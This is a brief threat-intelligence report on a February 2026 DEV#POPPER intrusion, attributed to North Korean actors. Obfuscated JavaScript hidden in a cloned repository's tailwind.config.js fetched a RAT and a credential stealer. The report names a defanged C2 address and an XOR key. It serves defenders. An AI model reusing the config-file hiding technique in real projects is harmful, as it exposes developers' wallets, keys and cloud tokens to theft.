eSentire TRU observed DEV#POPPER on an Energy, Utilities, and Waste customer machine in February 2026 and attributes the activity with high confidence to a North Korean state-sponsored APT based on shared TTPs with related campaigns. The intrusion began when the victim cloned the weaponized ShoeVista GitHub repository, launched its frontend, and triggered obfuscated JavaScript hidden in frontend/tailwind.config.js. The staged chain contacted 23.27.20[.]143 with custom headers, decrypted follow-on code with the XOR key "ThZG+0jfXE6VAGOJ", and ultimately loaded DEV#POPPER RAT plus the Python-based OmniStealer. The malware targets macOS most often but also supports Windows and Linux, with objectives including cryptocurrency wallet theft and access to developer secrets such as source-code credentials, API keys, passwords, and cloud tokens.